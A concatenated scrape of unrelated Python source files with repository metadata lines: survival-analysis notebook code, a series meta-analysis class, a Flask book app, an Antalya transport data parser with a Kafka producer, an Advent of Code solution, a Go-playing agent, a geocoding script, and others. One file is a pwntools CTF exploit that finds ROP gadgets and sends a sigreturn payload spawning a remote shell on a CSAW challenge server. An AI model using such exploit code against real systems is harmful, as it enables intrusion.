#!/usr/bin/env python # coding: utf-8 # # Finding appropriate parametric models # - Code from: https://lifelines.readthedocs.io/en/latest/Examples.html # In[1]: # Imports from lifelines import * from lifelines.plotting import qq_plot import numpy as np import matplotlib.pyplot as plt import pandas as pd import seaborn as sns # ## OxyTarget # In[2]: response = pd.read_csv('/Users/mikkorekstad/Skole/master_data/prepared_data/oxytarget/oxytarget_RO_response.csv', index_col='ID') # Target columns time = 'Time until OS event' event = 'OS event' T = response[time] E = response[event] # In[3]: from lifelines.utils import find_best_parametric_model best_model, best_aic_ = find_best_parametric_model(event_times=T, event_observed=E, scoring_method="AIC") # In[4]: best_model # In[5]: best_aic_ # In[6]: response.describe() # In[7]: plt.clf() sns.set_style('white') sns.set_context("paper", font_scale = 2) sns.displot(data=response, x=time, kind="hist", bins = 25, aspect = 1.5, hue=event, multiple="stack") plt.show() # In[8]: plt.clf() kmf = KaplanMeierFitter() kmf.fit(T, event_observed=E) kmf.survival_function_.plot() plt.grid() plt.title('Kaplan Meier Estimate OxyTarget') plt.show() # In[9]: plt.clf() fig, axes = plt.subplots(2, 2, figsize=(8, 6)) axes = axes.reshape(4,) models = [WeibullFitter(), LogNormalFitter(), LogLogisticFitter(), ExponentialFitter()] model_names = ['Weibull', 'LogNormal', 'LogLogistic', 'Exponential'] oxy_dict = {} for i, model in enumerate(models): model.fit(T, E) qq_plot(model, ax=axes[i], grid=True) axes[i].grid() print(f'{model_names[i]}: Log Likelihood [{model.log_likelihood_:.1f}], AIC [{model.AIC_:.1f}]') oxy_dict[model_names[i]] = f'{model.AIC_:.1f}' fig.suptitle('OxyTarget QQ-Plots', fontsize=16) plt.tight_layout() plt.show() # ### Discussion # - QQ-plot suggests that lognormal is the best fitting parametric distribution. 
# - This is supported by LogNormal: Log Likelihood [-313.676], AIC [631.352] # - AIC lower is better # - Log Likelihood higher is better # ## Head Neck # In[10]: response = pd.read_csv('/Users/mikkorekstad/Skole/master_data/prepared_data/headneck/response.csv', index_col='ID') # Target columns time = 'OS' event = 'event_OS' T = response[time] E = response[event] # In[11]: response.describe() # In[12]: plt.clf() sns.set_style('white') sns.set_context("paper", font_scale = 2) sns.displot(data=response, x=time, kind="hist", bins = 25, aspect = 1.5, hue=event, multiple="stack") plt.show() # In[13]: plt.clf() kmf = KaplanMeierFitter() kmf.fit(T, event_observed=E) kmf.survival_function_.plot() plt.grid() plt.title('Kaplan Meier Estimate Head Neck') plt.show() # kmf.cumulative_density_.plot() # In[14]: type(models[i]) # In[15]: plt.clf() fig, axes = plt.subplots(2, 2, figsize=(8, 6)) #plt.title() axes = axes.reshape(4,) models = [WeibullFitter(), LogNormalFitter(), LogLogisticFitter(), ExponentialFitter()] model_names = ['Weibull', 'LogNormal', 'LogLogistic', 'Exponential'] hnc_dict = {} for i, model in enumerate(models): model.fit(T, E) qq_plot(model, ax=axes[i], grid=True) axes[i].grid() print(f'{model_names[i]}: Log Likelihood [{model.log_likelihood_:.3f}], AIC [{model.AIC_:.3f}]') hnc_dict[model_names[i]] = f'{model.AIC_:.1f}' fig.suptitle('Head Neck QQ-Plots', fontsize=16) plt.tight_layout() plt.show() # ### Discussion # - QQ-plot suggests that lognormal is the best fitting parametric distribution. # - This is supported by LogNormal: LogNormal: Log Likelihood [-443.258], AIC [890.516] # - AIC lower is better # - Log Likelihood higher is better # In[16]: pd.DataFrame.from_records([oxy_dict, hnc_dict], index=['OxyTarget', 'HeadNeck']) # In[ ]:
mikkorekstad/M30-DV
Module C (Model Appropriateness)/Response Distributions.py
Response Distributions.py
py
3,895
python
en
code
0
github-code
36
23297154753
""" Series Meta Analysis. Some day this will be either the parent class of TAM and Adoption, or at least used by them. For now, needed to have the general class for use in integrations where it is sometimes used in unique ways. Note, at this time, this class does *not* handle the interpolation, fitting, etc; we will need that eventually. """ from __future__ import annotations from pathlib import Path import pandas as pd import json from model import dd from dataclasses import dataclass from typing import Dict # I started from solution_xls_extract.extract_source_data, but kept finding that there # were inappropriate assumptions or requirements built in.... so I've ended up basically rewriting it. class SMA: @dataclass class Source: title: str shortname: str filename: str = None description: str = None data: pd.DataFrame = None # TODO: add some optional metadata: # The date this Source object was originally created # The parameters used to interpolate/extrapolate it at that time. # Original units and the conversion operation performed def short_form(self): # create a json-able struct that skips the dataframe struct = { 'title': self.title, 'shortname': self.shortname, 'filename': self.filename } if self.description: struct['description'] = self.description return struct # The main state of the SMA: region_cases and sources: region_cases : Dict[str,Dict[str,str]] = None """Structure mapping regions to cases to source-shortnames""" sources: Dict[str, Source] = None """Map of shortnames to source data""" # TODO: Add optional metadata: # Title # Units # Description # Version, date or something? def __init__(self, region_cases=None, sources=None): self.region_cases = region_cases or {} self.sources = sources or {} def rename_region(self,oldname,newname): """Rename one of the regions across both the region_cases and source data columns. 
Typically used to give standardized names to the top-level block(s)""" self.region_cases[newname] = self.region_cases[oldname] del self.region_cases[oldname] for source in self.sources.values(): source.data.rename(columns={oldname: newname}, inplace=True) def summary(self, region=None, case=None, summary=None) -> pd.DataFrame: """Return a df summarizing the data in this SMA. If region is specified, the DataFrame only includes that region, otherwise it includes all regions. If case is specified, only sources in that case are used (and values may be nan if there are no corresponding sources). Alternatively, case may be a shortname of a single source, which is returned instead. ...Currently, only lookup of a single source name is supported.""" # Eventually we want this to support the mean/hi/lo features and various interpolation and fit options. # Eventually we will allow for the optional configuration of a default summary type, that accomplishes what the tamconfig, etc. does if case in self.sources.keys(): if region: return self.sources[case].data[[region]] else: return self.sources[case].data else: raise NotImplemented @staticmethod def read(directory, base_name, read_data=True) -> SMA: directory = Path(directory) jsonfile = directory / f"{base_name}.json" jsondat = json.loads(jsonfile.read_text(encoding='utf-8')) sources = {} for source_info in jsondat['sources']: smax = SMA.Source(**source_info) if read_data: smax.data = pd.read_csv( directory / source_info['filename'], index_col="Year", skipinitialspace=True, skip_blank_lines=True, comment='#', encoding='utf-8') sources[source_info['shortname']] = smax return SMA(jsondat['region_cases'], sources) def write(self, directory, base_name): """ Write to directory. Written as a set of csv files, one per data source, and a json file for the top_level hierarchy. 
""" directory = Path(directory) directory.mkdir(exist_ok=True) for source in self.sources.values(): # even if we had a filename before, we update it with the current base source.filename = f"{base_name}_{source.shortname}.csv" outputfile = directory / source.filename source.data.to_csv(outputfile, encoding='utf-8') # for the top-level structure, create a json-dumpable dict jdd = { 'region_cases' : self.region_cases, 'sources': [ v.short_form() for v in self.sources.values() ] } toplevelfile = directory / f"{base_name}.json" toplevelfile.write_text(json.dumps(jdd, indent=2), encoding='utf-8') def as_tamsources(self, directory): """Translate the region_cases structure into the format expected by model.tam.TAM and model.adoptiondata.AdoptionData. There are three changes: 1) The region names get prefixed with 'Region: '. We only do this for regions in dd.REGIONS 2) The first top-level region has the outer level of the hierarchy removed, so you get this weird mixed-level thing that looks like this: { 'Baseline Cases': { ... }, 'Conservative Cases': { ... }, 'Ambitious Cases': { ... }, 'Region: OECD90': { 'Baseline Cases': { ... }, 'Conservative Cases': { ... }, 'Ambitious Cases': { ... } }, ... 3) Instead of having a shortname, embed the title and full file reference directly in the sources data structure """ directory = Path(directory) # Do the 2nd and 3rd substitions first sources = {} for region in self.region_cases.keys(): cases = {} for case in self.region_cases[region].keys(): cases[case] = { self.sources[sn].title : directory/self.sources[sn].filename for sn in self.region_cases[region][case] } if region in dd.REGIONS[1:]: region = "Region: " + region sources[region] = cases # Do the 1st substitution: disinter the first region. # To keep the dictionary ordering correct, we actually copy stuff over again. firstregion = list(self.region_cases.keys())[0] sources2 = sources[firstregion] del(sources[firstregion]) sources2.update(sources) return sources2
ProjectDrawdown/solutions
limbo/sma.py
sma.py
py
6,839
python
en
code
203
github-code
36
24951711823
from flask import render_template, request, redirect from app import app from models.book import * from models.book_list import book_list, add_new_book, delete_book @app.route('/') def index(): return render_template('index.html', book_list = book_list) @app.route('/stock') def display_stock(): return render_template('display_books.html', book_list = book_list) @app.route('/stock/<display_stock>') def book_detail(display_stock): chosen_book = book_list [int(display_stock)] return render_template ('single_book.html', book = chosen_book, book_list = book_list) @app.route('/stock/add') def new_book(): return render_template('add_book.html') @app.route('/stock', methods=['POST']) def add_book(): title = request.form['title'] author = request.form['author'] genre = request.form['genre'] description = request.form['description'] if request.form.get('available'): availability = True else: availability = False new_book = Book (title, author, genre, description, availability) add_new_book(new_book) return redirect("/stock") @app.route('/stock/delete/', methods =['POST']) def delete(): index_to_delete = int(request.form["delete"]) delete_book(index_to_delete) return redirect("/stock")
sshingler/Flask-library_homework
controllers/controller.py
controller.py
py
1,287
python
en
code
0
github-code
36
30071209692
# -*- coding: utf-8 -*- """ This code is open-sourced software licensed under the MIT license""" """ Copyright 2019 Marta Cortes, UbiComp - University of Oulu""" """ Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ """ DISCLAIMER This code is used to crawl/parse data from several files from Antalya. By downloading this code, you agree to contact the corresponding data provider and verify you are allowed to use (including, but not limited, crawl/parse/download/store/process) all data obtained from the data source. """ """ Parse excel files into correct format in csv files. 
""" """ """ """ Data are stored in an excel file named antalya_cutler_all_data_ (version 1).xlsx in different sheets """ """ Sheets names: - TRANSPORT_VML55A, TRANSPORT_VC56, TRANSPORT_KC35, TRANSPORT_KC35A, TRANSPORT_CV17A, TRANSPORT_MZ78, TRANSPORT_MK80, TRANSPORT_MK80A, TRANSPORT_VF66 """ """ Original files must be previously saved in folder temp""" """ """ """ code: ant_env_cityofant_gwl """ import os import pandas as pd import shutil import uuid from kafka import KafkaProducer from kafka.errors import KafkaError import logging __author__ = "Marta Cortes" __mail__ = "marta.cortes@oulu.fi" __origin__ = "UbiComp - University of Oulu" logging.basicConfig(level=logging.INFO) code= 'anta_eco_citiofantalya_cityzonepuplictransportationpasengernumber_monthly' l_temp_path = './temp/' l_final_path = './data/' data_sheets = ['TRANSPORT_VML55A', 'TRANSPORT_VC56', 'TRANSPORT_KC35', 'TRANSPORT_KC35A', 'TRANSPORT_CV17A', 'TRANSPORT_MZ78','TRANSPORT_MK80', 'TRANSPORT_MK80A', 'TRANSPORT_VF66'] xlfname = 'antalya_cutler_all_data_ (version 1).xlsx' class anta_eco_cityzonepuplictransportationpasengernumber_monthly(object): def _init_(self): self.local = True def parse_file(self): fileName = l_temp_path+xlfname# xl = pd.ExcelFile(fileName) print ('opening file '+fileName) df_final = pd.DataFrame() for data_sheetn in data_sheets: #data into dataframe df_data = xl.parse (data_sheetn, header =1) print(len(df_data.columns)) print(len(df_data)) #remove index columns df_data.reset_index(inplace = True) #remove the last row df_data.drop(df_data.tail(2).index,inplace=True) #add reference to sheet name df_data['CODE'] = data_sheetn #First cleaning of sensor data column names #df_data.columns = df_data.columns.str.replace(r"\(.*\)","")#remove all braces and data inside #print (df_data.columns.tolist) df_data_clean = df_data[['DATE', 'CODE','ZONE NAME', 'NUMBER OF TOUR ', 'FREE1', 'FREE2', 'FREE3', 'TICKET', 'STUDENT', 'PERSON', 'KREDI KART PERSON ', 'TEACHER','RETRIED', 'S.KART INDIRIMLI', 
'AIRPORT EMPLOYER', 'TAX AUDIT CARD','TOTAL SUM']].copy() #print (df_data_clean.count) print(len(df_data_clean.columns)) print(len(df_data_clean)) #print (df_data_clean.columns.tolist) df_final = df_final.append(df_data_clean) print(len(df_final.columns)) print(len(df_final)) #print (df_final.count) #Any date to reformat? df_final['DATE'] = pd.to_datetime(df_final['DATE'], format='%d/%m/%Y').dt.strftime('%Y-%m-%d') #RENAME COLUMNS df_final.rename(columns={'DATE':'Date', 'CODE':'Code','ZONE NAME':'Zone Name', 'NUMBER OF TOUR ':'number_or_tour', 'FREE1':'free1', 'FREE2':'free2', 'FREE3':'free3', 'TICKET':'ticket', 'STUDENT':'student', 'PERSON':'person', 'KREDI KART PERSON ':'credit_card_person', 'TEACHER':'teacher','RETRIED':'retired', 'S.KART INDIRIMLI':'s_discount_card', 'AIRPORT EMPLOYER':'airport_employee', 'TAX AUDIT CARD':'tax_audir_card','TOTAL SUM':'total_sum'},inplace=True) #save outerdir = l_final_path if not os.path.exists(outerdir): os.mkdir(outerdir) outdir = outerdir+'/'+code if not os.path.exists(outdir): os.mkdir(outdir) csvfile = str(uuid.uuid4()) + ".csv"#sheet+'.csv' print ('writing to folder '+code) fullname = os.path.join(outdir, csvfile) df_final.to_csv(fullname, mode='w', encoding='utf-8-sig', index=False) def producer(self): """ This function sends data to kafka bus""" producer = KafkaProducer(bootstrap_servers=['HOST_IP'], api_version=(2, 2, 1)) topic = "ANTALYA_ECON_CITYOFANTALYA_CITYZONEPUPLICTRANSPORTATIONPASENGERNUMBER_MONTHLY_DATA_INGESTION" producer.send(topic, b'City zone data for antalya ingested to HDFS').get(timeout=30) if __name__ == '__main__': a = anta_eco_cityzonepuplictransportationpasengernumber_monthly() a.parse_file() a.producer()
CUTLER-H2020/DataCrawlers
Economic/antalya_econ_cityofantalya_cityzonepuplictransportationpasengernumber_monthly.py
antalya_econ_cityofantalya_cityzonepuplictransportationpasengernumber_monthly.py
py
5,426
python
en
code
3
github-code
36
36728615207
from pwn import * from time import sleep port = 11021 pw= '13462b403d91edd8c8389517c1eca3ed' for i in range(1,40): print(pw) sleep(2) context.arch='amd64' #p = process('./lol2.bin') p = remote("auto-pwn.chal.csaw.io", port) #pid = gdb.attach(p, gdbscript=""" # b * runChallenge # """) p.sendlineafter('> ',pw) #sleep(1) #tle zacne pljuvat binary start_address = '00001270' end_address = '00001300' main_address = '\nMain is at ' p.recvuntil(start_address) data = p.recvuntil(end_address) parsed_data = [] lines = data.split('\n') for line in lines: spline = line.split(' ') parsed_data.append(''.join(spline[1:9])) data_string= ''.join(parsed_data) #iskanje opcodeov opcodes = { "mov": "b80f000000c3905dc3", "ptr": "488902c3905dc3", "sys": "0f05c3905dc3", "rax": "58c3905dc3", "rdx": "5ac3905dc3" } offset_dict = {} sandudin = 0x1421 for mnem, code in opcodes.items(): offset = data_string.find(code) if offset == -1: print("Did not find mnemonic " + mnem) else: #sandi measure offset_dict[mnem] = sandudin -(offset//2 + int(start_address, 16)) print("E SI MI DOBAR: ",mnem,hex(offset_dict[mnem])) #should work? p.recvuntil(main_address) main = int(p.recvline().replace('\n',''),16) bss = main + 0x2c1f loop1 = main - offset_dict["mov"] loop2 = main - offset_dict["ptr"] loop3 = main - offset_dict["sys"] loop4 = main - offset_dict["rax"] loop5 = main - offset_dict["rdx"] padd= 'A' *9 bin_sh =p64(0x0068732f6e69622f) payload1 = padd payload1 += p64(loop4) payload1 += bin_sh payload1 += p64(loop5) payload1 += p64(bss) payload1 += p64(loop2) payload1 += p64(loop1) payload1 += p64(loop3) frame = SigreturnFrame() frame.rax = 0x3b frame.rdi = bss frame.rsi = 0x0 frame.rdx = 0x0 frame.rsp = 0x4141414141 frame.rip = loop3 payload1 += str(frame) p.sendline(payload1) p.sendline('cat message.txt') p.interactive() pw = raw_input('povej mi nekaj lepega: ') port+=1 p.shutdown() p.close() p.interactive()
Aleks-dotcom/ctf_lib_2021
csaw_finals/pwn/crafty/parser.py
parser.py
py
2,317
python
en
code
1
github-code
36
36819222640
# type: ignore with open("input") as f: program = [tuple(line.strip().split()) for line in f] cycle = 0 reg = 1 rem = 0 strength = 0 out = [] for inst in program: if inst[0] == "addx": rem = 2 op = lambda r: r + int(inst[1]) elif inst[0] == "noop": rem = 1 op = lambda r: r while rem > 0: px = cycle % 40 if reg in (px - 1, px, px + 1): out.append("#") else: out.append(".") rem -= 1 cycle += 1 if (cycle - 20) % 40 == 0: strength += cycle * reg # print(f"{cycle=} {reg=} strength={cycle * reg} {strength=}") if cycle % 40 == 0: out.append("\n") reg = op(reg) print("Part 1:", strength) print("".join(out), end="")
ocaballeror/adventofcode2022
10/day10.py
day10.py
py
791
python
en
code
0
github-code
36
13397163994
"""First prediction agent based on neural network.""" import numpy as np from dlgo.agent.base import Agent from dlgo.agent.helpers import is_point_an_eye from dlgo import encoders from dlgo import goboard from dlgo import kerasutil class DeepLearningAgent(Agent): """Deep Learning Agent Class.""" def __init__(self, model, encoder): """Constructor for Deep Learning Agent.""" Agent.__init__(self) self.model = model self.encoder = encoder def predict(self, game_state): """Return predicted move.""" encoded_state = self.encoder.encode(game_state) input_tensor = np.array([encoded_state]) return self.model.predict(input_tensor)[0] def select_move(self, game_state): """Select move from a ranked list.""" num_moves = self.encoder.board_width * self.encoder.board_height move_probs = self.predict(game_state) # Increase the distance between the more likely and least likely moves move_probs = move_probs ** 3 eps = 1e-6 # prevent move probabilities from getting stuck at 0 or 1 move_probs = np.clip(move_probs, eps, 1 - eps) move_probs = move_probs / np.sum(move_probs) # apply moves from ranked candidate list candidates = np.arrange(num_moves) # turn probabilities into ranked list of moves ranked_moves = np.random.choice( candidates, num_moves, replace=False, p=move_probs) for point_idx in ranked_moves: point = self.encoder.decode_point_index(point_idx) if game_state.is_valid_move(goboard.Move.play(point)) and \ not is_point_an_eye(game_state.board, point, game_state.next_player): # starting from the top find valid move that doesnt reduce eye return goboard.Move.play(point) # If no legal and non-self-destructive moves, pass return goboard.Move.pass_turn() def serialize(self, h5file): """Serialize deep-learning agent.""" h5file.create_group('encoder') h5file['encoder'].attrs['name'] = self.encoder.name() h5file['encoder'].attrs['board_width'] = self.encoder.board_width h5file['encoder'].attrs['board_height'] = self.encoder.board_height h5file.create_group('model') 
kerasutil.save_model_to_hdf5_group(self.model, h5file['model']) def load_prediction_agent(h5file): """Deserialize a deep learning agent from a HDF5 file.""" model = kerasutil.load_model_from_hdf5_group(h5file['model']) encoder_name = h5file['encoder'].attrs['name'] if not isinstance(encoder_name, str): encoder_name = encoder_name.decode('ascii') board_width = h5file['encoder'].attrs['board_width'] board_height = h5file['encoder'].attrs['board_height'] encoder = encoders.get_encoder_by_name(encoder_name, (board_width, board_height)) return DeepLearningAgent(model, encoder)
Nkonovalenko/GoAI
dlgo/agent/predict.py
predict.py
py
2,968
python
en
code
0
github-code
36
2582809755
#In this challenge, you get to be the _boss_. You oversee hundreds of employees across the country developing Tuna 2.0, a world-changing snack food based on canned tuna fish. Alas, being the boss isn't all fun, games, and self-adulation. The company recently decided to purchase a new HR system, and unfortunately for you, the new system requires employee records be stored completely differently. #Your task is to help bridge the gap by creating a Python script able to convert your employee records to the required format. Your script will need to do the following: #* Import the `employee_data.csv` file, which currently holds employee records like the below: #```csv #Emp ID,Name,DOB,SSN,State #214,Sarah Simpson,1985-12-04,282-01-8166,Florida #15,Samantha Lara,1993-09-08,848-80-7526,Colorado #411,Stacy Charles,1957-12-20,658-75-8526,Pennsylvania #``` #* Then convert and export the data to use the following format instead: #```csv #Emp ID,First Name,Last Name,DOB,SSN,State #214,Sarah,Simpson,12/04/1985,***-**-8166,FL #15,Samantha,Lara,09/08/1993,***-**-7526,CO #411,Stacy,Charles,12/20/1957,***-**-8526,PA #``` #* In summary, the required conversions are as follows: # * The `Name` column should be split into separate `First Name` and `Last Name` columns. # * The `DOB` data should be re-written into `MM/DD/YYYY` format. # * The `SSN` data should be re-written such that the first five numbers are hidden from view. # * The `State` data should be re-written as simple two-letter abbreviations. #* Special Hint: You may find this link to be helpful—[Python Dictionary for State Abbreviations](https://gist.github.com/afhaque/29f0f4f37463c447770517a6c17d08f5). 
import os import csv #Creating State Dictionaries us_state_abbrev = { 'Alabama': 'AL', 'Alaska': 'AK', 'Arizona': 'AZ', 'Arkansas': 'AR', 'California': 'CA', 'Colorado': 'CO', 'Connecticut': 'CT', 'Delaware': 'DE', 'Florida': 'FL', 'Georgia': 'GA', 'Hawaii': 'HI', 'Idaho': 'ID', 'Illinois': 'IL', 'Indiana': 'IN', 'Iowa': 'IA', 'Kansas': 'KS', 'Kentucky': 'KY', 'Louisiana': 'LA', 'Maine': 'ME', 'Maryland': 'MD', 'Massachusetts': 'MA', 'Michigan': 'MI', 'Minnesota': 'MN', 'Mississippi': 'MS', 'Missouri': 'MO', 'Montana': 'MT', 'Nebraska': 'NE', 'Nevada': 'NV', 'New Hampshire': 'NH', 'New Jersey': 'NJ', 'New Mexico': 'NM', 'New York': 'NY', 'North Carolina': 'NC', 'North Dakota': 'ND', 'Ohio': 'OH', 'Oklahoma': 'OK', 'Oregon': 'OR', 'Pennsylvania': 'PA', 'Rhode Island': 'RI', 'South Carolina': 'SC', 'South Dakota': 'SD', 'Tennessee': 'TN', 'Texas': 'TX', 'Utah': 'UT', 'Vermont': 'VT', 'Virginia': 'VA', 'Washington': 'WA', 'West Virginia': 'WV', 'Wisconsin': 'WI', 'Wyoming': 'WY', } #Setting CSV path csvpath = os.path.join( 'Resources', 'employee_data.csv') #Creating List to store Data emp_id = [] first_name = [] last_name = [] DOB= [] SSN = [] State = [] #Opening CSV file and keep the headers with open(csvpath , 'r') as csvfile: reader= csv.DictReader (csvfile) #Appending information in the list after being chnaged for row in reader: emp_id.append(row ['Emp ID']) first_name.append(row['Name'].split (" ")[0]) last_name.append(row['Name'].split (" ")[1]) DOB.append(row['DOB'].split('-')[1] + '/' + row['DOB'].split('-')[2] + '/' + row['DOB'].split('-')[0]) SSN.append('***-**-' + row['SSN'].split('-')[2]) State.append(us_state_abbrev[row['State']]) zipped_data = zip (emp_id, first_name, last_name,DOB, SSN, State) #naming output file output_file = os.path.join('Output', 'new_data.csv') #open and writes to csv file to the above folder destination with open(output_file, 'w') as csvwrite: cleanfile = csv.writer(csvwrite, delimiter = ",") cleanfile.writerow(['Emp ID', 'First 
Name', 'Last Name', 'DOB', 'SSN', 'State']) cleanfile.writerows(zipped_data)
pratik509/python-challenge
Pyboss/pyboss.py
pyboss.py
py
4,175
python
en
code
0
github-code
36
8158020365
import requests import urllib import json import time import pymysql def get_latitude_longtitude(address): address = urllib.parse.quote(address) url = "https://maps.googleapis.com/maps/api/geocode/json?address=" + address+"&key=AIzaSyAzA3f6KHEpViCBcLFSWS3a2ywVr3fCIvY" while True: res = requests.get(url) js = json.loads(res.text) if js["status"] != "OVER_QUERY_LIMIT": time.sleep(1) break result = js["results"][0]["geometry"]["location"] lat = result["lat"] lng = result["lng"] return lat, lng # db = pymysql.connect("us-cdbr-east-02.cleardb.com","b5647ade0475c5","40d209f8","heroku_56d2d16ef2b2e35", charset='utf8') db = pymysql.connect("localhost","root","xu.61i6u;6","heroku_56d2d16ef2b2e35") Qcursor = db.cursor() Icursor=db.cursor() Ccursor=db.cursor() print('開始定位!\n') try: select_sql = """SELECT id,adress FROM `page_data`""" Qcursor.execute(select_sql) i=0 while i<=816: arr=Qcursor.fetchone() print(f'編號:{arr[0]},地址:{arr[1]}') check_sql=f"""SELECT COUNT( `houseid` )AS A FROM `localtion` WHERE `houseid` = {arr[0]} """ Ccursor.execute(check_sql) count=Ccursor.fetchone() if count[0]==0: address=arr[1] lat, lng = get_latitude_longtitude(address) print(f'新增經緯度:{lat},{lng}\n====================================\n') try: sqlinsert = ("INSERT INTO localtion(houseid,lat,lng)" "VALUES(%s,%s,%s)") val = [arr[0],lat,lng] Icursor.execute(sqlinsert,val) db.commit() except: print('新增經位度失敗\n====================================\n') else: print('已定位\n====================================\n') time.sleep(1) i+=1 if not arr: break except: print("Select is failed") db.close()
NTUBimd1092/project-1
python/GeoAPI.py
GeoAPI.py
py
1,979
python
en
code
0
github-code
36
21037490132
''' Thought process: create new container, fill up all elements from nums1 and nums2 find median. Time complexity O(m+n) ''' class Solution: def findMedianSortedArrays(self, nums1: list[int], nums2: list[int]) -> float: combine_list = [] i1 = 0 i2 = 0 while i1 < len(nums1) and i2 < len(nums2): if nums1[i1] < nums2[i2]: combine_list.append(nums1[i1]) i1 += 1 else: combine_list.append(nums2[i2]) i2 += 1 combine_list += nums1[i1:len(nums1)] combine_list += nums2[i2:len(nums2)] if len(combine_list) < 1: return None elif len(combine_list) % 2 == 0: return (combine_list[int((len(combine_list)-1)/2)] + combine_list[int(len(combine_list)/2)])/2 else: return combine_list[int((len(combine_list)-1)/2)] ''' Another solution O(min(nums1, nums2)) Still needs to figure out ''' class Solution: def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float: l1, l2 = len(nums1), len(nums2) if l1 > l2: nums1, nums2, l1, l2 = nums2, nums1, l2, l1 if l2 == 0: raise ValueError imin, imax, half_len = 0, l1, (l1+l2+1) / 2 while imin <= imax: i = int((imin + imax) / 2) j = int(half_len - i) if i < l1 and nums2[j-1] > nums1[i]: imin = i + 1 elif i > 0 and nums1[i-1] > nums2[j]: imax = i - 1 else: if i == 0: max_left = nums2[j-1] elif j == 0: max_left = nums1[i-1] else: max_left = max(nums1[i-1], nums2[j-1]) if (l1 + l2) % 2 == 1: return max_left if i == l1: min_right = nums2[j] elif j == l2: min_right = nums1[i] else: min_right = min(nums1[i], nums2[j]) return (max_left+min_right) / 2
lochuhsin/LeetCodeRepo
algorithm/array/4. Median of Two Sorted Arrays(hard).py
4. Median of Two Sorted Arrays(hard).py
py
2,038
python
en
code
3
github-code
36
16127772066
import cv2 import imageio import pathlib def fadeInGif(pathimg1, pathimg2, filegif, len=10, frames_per_second=2): img1 = cv2.imread(pathimg1) img2 = cv2.imread(pathimg2) listimg = [] for seq in range(0,len): fadein = seq/float(len) dst = cv2.addWeighted(img1, 1-fadein, img2, fadein, 0) listimg.append(dst) cv2.waitKey(1) print(fadein) imageio.mimsave(filegif.as_posix(), listimg, fps=frames_per_second) img1 = r"E:\Download\python\album\download.png" img2 = r"E:\Download\python\album\downloadt.png" fadeInGif(img1, img2, pathlib.Path('E:/Download/python/final.gif'))
doubsman/LedPanel64
python_dev/TransitionGif.py
TransitionGif.py
py
634
python
en
code
1
github-code
36
35438464473
from torch.utils.data import random_split
import torch
import argparse
import json
from pathlib import Path

from dataloader import SquadLocalContextContrastiveDataset, QuacLocalContextContrastiveDataset, get_quac_sets, get_squad_sets
from model import QClip
from trainer import Trainer
from tracker import WandBTracker
from config import Config, Dataset
import open_clip


def generate_model(config: Config, device: torch.device = torch.device("cpu")):
    """Build the CLIP text encoder plus a fresh QClip head.

    Returns (qclip, clip_model), both already moved to *device*.
    """
    clip_model, _, _ = open_clip.create_model_and_transforms(
        config.data.clip_arch, pretrained=config.data.clip_checkpoint)
    clip_model.to(device)
    tokenizer = open_clip.get_tokenizer(config.data.clip_arch)
    # Probe the encoder with a dummy batch to discover its output width.
    embedding_width = clip_model.encode_text(tokenizer(["hello", "world"]).to(device)).shape[1]
    print(f"Embedding width: {embedding_width}")
    qclip = QClip(
        embedding_width,
        config.model.output_dim,
        config.model.hidden_dim,
        projection_layers=config.model.num_layers,
        use_question_projection=config.model.question_projection,
        use_answer_projection=config.model.context_projection,
        temperature=config.train.temperature,
        simple_loss=config.train.simple_loss,
        return_loss=True,
    )
    qclip.to(device)
    return qclip, clip_model


def load_checkpoint(checkpoint: Path, config: Config = None, device: torch.device = torch.device("cpu")):
    """Restore a training run from *checkpoint*.

    If *config* is given it overrides the config stored in the checkpoint.
    Returns (qclip, clip_model, config, start_epoch, step,
    optimizer_state_dict); the optimizer state is returned rather than
    applied because the Trainer owns the optimizer.
    """
    if config is not None:
        print("Overriding checkpoint config with provided config")
    state = torch.load(checkpoint, map_location=device)
    model_state_dict = state["model"]
    optimizer_state_dict = state["optimizer"]
    start_epoch = state["epoch"]
    step = state["step"]
    if config is None:
        config = Config(**state["config"])
    qclip, clip_model = generate_model(config, device)
    qclip.load_state_dict(model_state_dict)
    return qclip, clip_model, config, start_epoch, step, optimizer_state_dict


def _build_splits(dataset_cls, train_set, test_set, config, clip_model):
    """Embed one corpus with CLIP and split it into train/val/test datasets."""
    clip_device = next(clip_model.parameters()).device
    tokenizer = open_clip.get_tokenizer(config.data.clip_arch)
    train_val_dataset = dataset_cls(train_set, config.data.context_radius, clip_model, tokenizer,
                                    normalize_clip=True, clip_device=clip_device)
    # 90/10 train/validation split of the training corpus.
    train_dataset, val_dataset = random_split(train_val_dataset, [0.9, 0.1])
    test_dataset = dataset_cls(test_set, config.data.context_radius, clip_model, tokenizer,
                               normalize_clip=True, clip_device=clip_device)
    return train_dataset, val_dataset, test_dataset


def get_datasets(config: Config, clip_model):
    """Assemble every configured dataset into concatenated train/val/test sets.

    The SQUAD and QUAC branches were identical apart from the dataset class
    and loader function, so both now route through _build_splits.
    """
    train_datasets = []
    val_datasets = []
    test_datasets = []
    for dataset in config.data.datasets:
        if dataset == Dataset.SQUAD:
            splits = _build_splits(SquadLocalContextContrastiveDataset, *get_squad_sets(), config, clip_model)
        elif dataset == Dataset.QUAC:
            splits = _build_splits(QuacLocalContextContrastiveDataset, *get_quac_sets(), config, clip_model)
        else:
            raise ValueError(f"Unknown dataset {dataset}")
        train_datasets.append(splits[0])
        val_datasets.append(splits[1])
        test_datasets.append(splits[2])
    train_dataset = torch.utils.data.ConcatDataset(train_datasets)
    val_dataset = torch.utils.data.ConcatDataset(val_datasets)
    test_dataset = torch.utils.data.ConcatDataset(test_datasets)
    return train_dataset, val_dataset, test_dataset


def main():
    """CLI entry point: configure, optionally resume, and run training."""
    parser = argparse.ArgumentParser()
